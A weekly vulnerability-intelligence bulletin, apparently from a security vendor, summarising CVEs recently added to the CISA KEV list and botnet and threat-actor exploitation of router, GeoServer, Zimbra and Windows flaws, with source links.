In a troubling development this week, cybersecurity vulnerabilities surged, with six new entries added to the CISA KEV list, a dramatic rise from just one CVE identified last week. Critical vulnerabilities identified in Ivanti EPM and Zimbra's postjournal service have become attractive targets for threat actors, primarily due to the availability of proof-of-concept exploits.  

The persistent threats posed by outdated vulnerabilities were exemplified by the Motion Spell GitHub repository and SAP Commerce Cloud, both of which were recognized as critical risks and subsequently added to the CISA KEV list.

Two significant command injection vulnerabilities affecting DrayTek Vigor routers, and D-Link DIR-820 routers were exploited by threat actors to disseminate the Mirai botnet. In addition, for the third week in a row, the Mirai botnet has targeted TP-Link Archer AX21 routers, showcasing its relentless focus on compromising consumer devices.  

Simultaneously, the Sysrv and Enemy botnets have been detected actively exploiting vulnerabilities in Spring Cloud Gateway, effectively broadening their scope of attack. Additionally, the IoT_Reaper botnet continues its operations, persistently targeting an eight-year-old vulnerability found in MVPower CCTV DVR models.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2024-29824

A critical SQL Injection vulnerability has been identified in the Ivanti EPM Versions 2022 SU5 and earlier. With a high CVSS Score of 9.6, this vulnerability was added to the CISA KEV catalog. Although this vulnerability has a low EPSS of 0.00067, the publicly available proof of concept makes it highly susceptible to exploitation.

CVE-2024-45519

A critical vulnerability in Zimbra's postjournal service enables unauthenticated attackers to execute arbitrary code on affected systems. With a CVSS score of 10 and an available proof-of-concept, this vulnerability has been added to the CISA KEV list, emphasizing the urgent need for users to apply patches and strengthen security measures.

CVE-2023-25280

According to Unit 42, a critical command injection vulnerability in D-Link DIR820LA1_FW105B03 routers has been actively exploited by a variant of the Mirai Botnet since March 2023. This vulnerability allows attackers to escalate privileges to root through a specially crafted payload. Due to its severity, it has been added to the CISA KEV list.

CVE-2021-4043

A null pointer dereference vulnerability has been identified in versions of the Motion Spell GitHub repository GPAC prior to 1.1.0, allowing attackers to execute arbitrary code. With a publicly available proof of concept demonstrating the exploit, this vulnerability has been classified as severe and subsequently added to the CISA KEV list.

CVE-2020-15415

A critical command injection vulnerability in DrayTek Vigor3900, Vigor2960, and Vigor300B routers allowed attackers to execute arbitrary code remotely. This vulnerability was exploited by the V3G4 variant of the Mirai botnet from July to December 2022 and has been recently added to the CISA KEV list.

CVE-2019-0344

A critical deserialization of untrusted data vulnerability in SAP Commerce Cloud allows attackers to execute malicious code on the target system by exploiting flaws in the deserialization process. By leveraging this flaw, attackers can execute arbitrary code with the privileges of the 'Hybris' user, potentially compromising the security of the application. This vulnerability has been added to the CISA KEV list, highlighting its severity and the urgent need for patching.

‍

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.

‍CVE-2024-36401

Recent investigations by Trend Micro have revealed that an eval injection vulnerability in GeoServer, which can lead to remote code execution, has been actively exploited by the Chinese threat actor Earth Baxia. This group has leveraged the flaw to deploy Cobalt Strike payloads, and a custom backdoor called EAGLEDOOR. Historically, attackers have also exploited this vulnerability to deliver SideWalk malware, a sophisticated backdoor tied to the APT41 threat group. Moreover, the flaw has been used to spread Mirai variants such as JenX and the Condi DDoS bot.

‍CVE-2024-21338

Sentinel Labs reported that an affiliate group associated with Mallox ransomware has exploited a privilege escalation vulnerability in Windows Kernel, using a Linux-based ransomware tool called Krystina to gain elevated privileges. This strategic use of cross-platform tools enhanced the attackers' ability to deepen system access and amplified the overall impact of their ransomware operations.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2024/10/02/cisa-adds-one-known-exploited-vulnerability-catalog  
2. https://www.cisa.gov/news-events/alerts/2024/10/03/cisa-adds-one-known-exploited-vulnerability-catalog
3. https://www.cisa.gov/news-events/alerts/2024/09/30/cisa-adds-four-known-exploited-vulnerabilities-catalog
4. https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/  
5. https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/  
6. https://unit42.paloaltonetworks.com/mirai-variant-v3g4/
7. https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-remote-code-injection/execution-vulnerability-(cve-2020-14472